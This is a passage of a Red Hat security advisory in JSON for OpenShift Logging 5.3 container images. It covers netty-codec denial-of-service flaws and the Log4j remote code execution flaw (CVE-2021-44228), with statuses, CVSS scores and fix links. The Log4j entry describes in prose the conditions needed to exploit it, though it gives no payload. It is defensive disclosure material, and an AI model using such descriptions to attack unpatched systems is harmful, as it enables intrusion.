"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", 
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data" }, { "cve": "CVE-2021-37137", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-09-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ 
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", 
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2004135" } ], "notes": [ { "category": "description", "text": "A flaw was found in the 
Netty\u0027s netty-codec due to unrestricted chunk lengths in the SnappyFrameDecoder. By sending a specially-crafted input, a remote attacker could cause excessive memory usage resulting in a denial of service.", "title": "Vulnerability description" }, { "category": "summary", "text": "netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of netty-codec package.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\nStarting in OCP 4.7, the elasticsearch component is shipping as a part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8). The elasticsearch component delivered in OCP 4.6 is marked as `Out of support scope` because these versions are already under Maintenance Phase of the support.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", 
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le" ], "known_not_affected": [ "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", 
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] }, 
"references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-37137" }, { "category": "external", "summary": "RHBZ#2004135", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004135" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-37137", "url": "https://www.cve.org/CVERecord?id=CVE-2021-37137" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137" }, { "category": "external", "summary": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv", "url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv" } ], "release_date": "2021-09-09T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T19:37:00+00:00", "details": "For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html", "product_ids": [ "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5129" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", 
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", 
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way" }, { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", 
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", 
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. 
Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and 